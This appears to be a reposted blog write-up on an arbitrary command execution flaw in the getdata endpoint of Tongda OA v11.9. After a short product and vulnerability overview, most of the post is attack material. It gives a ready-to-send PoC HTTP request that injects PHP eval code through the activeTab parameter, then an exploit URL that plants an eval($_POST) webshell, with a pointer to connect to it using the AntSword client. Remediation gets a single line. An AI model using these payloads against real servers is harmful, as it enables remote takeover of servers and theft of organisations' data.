Tongda OA v11.9 getdata arbitrary command execution vulnerability reproduction + exploitation

News 2023-06-05 01:57:53 views: null

1. Product introduction

      Tongda OA (Office Anywhere network intelligent office system) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices. Including process approval, administrative office, daily affairs, data statistical analysis, instant messaging, mobile office, etc., to help users reduce communication and management costs, and improve production and decision-making efficiency.

2. Vulnerability overview

    There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9, through which an attacker can execute arbitrary commands on the server to control server permissions.

3. Scope of influence

     Tongda OA <= v11.9

4. Reproduce the environment

       Windows Server 2019 builds Tongda OA v11.9 environment

     Installation package download address: https://cdndown.tongda2000.com/oa/2019/TDOA11.9.exe

     After downloading, double-click to install directly, and then set the access address and port to install

5. Vulnerability recurrence

    Access the vulnerable environment, burp captures packets and sends the Repeater module to reproduce

POC

GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22[base64加密的命令]%22)))%3B/*&id=19&module=Carouselimage HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=6nfieutt27f4d98vvp5029a472; KEY_RANDOMDATA=17755
Upgrade-Insecure-Requests: 1

 Let him output a string directly here Example: echo test111111111111;

successful output

6. Exploitation 

Construct exp

http://x.x.x.x:x/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[a]))%3B/*&id=19&module=Carouselimage

Directly write a sentence of Ma Zi and use the Chinese Ant Sword to connect

 7. Bug fixes

     Upgrade to a safe version.

Guess you like

Origin blog.csdn.net/qq_41904294/article/details/129689610
Recommended
Ranking
Reason Codes enhanced accounting documents
The first test case appium
Force command and dispatch emergency communication plan
Interview - What is concurrent programming
21 classic Python interview questions [recommended collection]
[Dahua Data Structure-Introduction to Data Structure ①]
Spring @ConfigurationProperties
Why do we want to broadcast live on WeChat public account? What are the advantages?
How to bring up the toolbar under the desktop of Apple laptop
Dialog: Manually enter information
Daily
More
2024-05-21(35)
2024-05-20(5)
2024-05-19(0)
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)

Code World

© 2018 codetd.com